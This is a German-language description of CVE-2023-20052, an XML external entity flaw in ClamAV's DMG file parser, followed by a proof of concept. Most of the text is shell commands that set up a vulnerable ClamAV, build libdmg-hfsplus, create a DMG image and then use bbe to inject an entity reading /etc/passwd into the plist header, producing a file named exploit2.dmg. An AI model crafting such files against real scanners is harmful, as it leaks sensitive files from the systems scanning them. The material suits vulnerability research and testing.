
CVE-2023-20052 Informationsleck-Schwachstelle im DMG-Dateiparser von ClamAV
CVE-2023-20052 – Schwachstelle mit Informationsleck im DMG-Dateiparser von ClamAV
Eine Schwachstelle im DMG-Dateiparser von ClamAV in den Versionen 1.0.0 und früher, 0.105.1 und früher sowie 0.103.7 und früher könnte es einem nicht authentifizierten, entfernten Angreifer ermöglichen, auf vertrauliche Informationen auf einem betroffenen Gerät zuzugreifen. Diese Schwachstelle ist auf die Aktivierung der XML-Entity-Substitution zurückzuführen, die zu einer XML-External-Entity-Injection führen kann. Ein Angreifer könnte diese Schwachstelle ausnutzen, indem er eine manipulierte DMG-Datei zur Überprüfung durch ClamAV auf einem betroffenen Gerät einreicht. Eine erfolgreiche Ausnutzung könnte es dem Angreifer ermöglichen, Bytes aus jeder Datei zu leaken, die vom ClamAV-Scanprozess gelesen werden kann.
sudo dpkg -i package-name.deb

sudo apt install -f
mkdir /usr/local/share/clamav
mv /usr/local/etc/freshclam.conf.sample /usr/local/etc/freshclam.conf

sudo adduser clamav

sudo chown -R 1002:1003 /usr/local/share/clamav
sudo freshclam



apt-get update
apt-get install -y ca-certificates gnupg wget
echo "deb http://archive.debian.org/debian-security stretch/updates main" >> /etc/apt/sources.list
wget -q -O - https://ftp-master.debian.org/keys/archive-key-9-security.asc | apt-key add -
apt-get update -y
sudo apt install -y libssl1.0-dev gcc g++ cmake zlib1g-dev genisoimage bbe git hfsplus

cd /libdmg-hfsplus
cmake .

make

cp dmg/dmg /bin
sudo genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg

bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit2.dmg

